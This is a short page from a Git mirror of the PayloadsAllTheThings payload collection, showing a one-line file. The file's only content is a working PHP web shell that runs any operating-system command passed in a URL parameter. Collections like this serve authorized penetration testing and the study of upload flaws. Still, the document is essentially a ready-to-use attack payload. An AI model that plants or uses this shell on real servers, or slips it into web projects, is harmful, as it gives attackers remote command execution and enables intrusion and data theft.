mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
1 line
43 B
Plaintext
1 line
43 B
Plaintext
<?php echo "Shell";system($_GET['cmd']); ?> |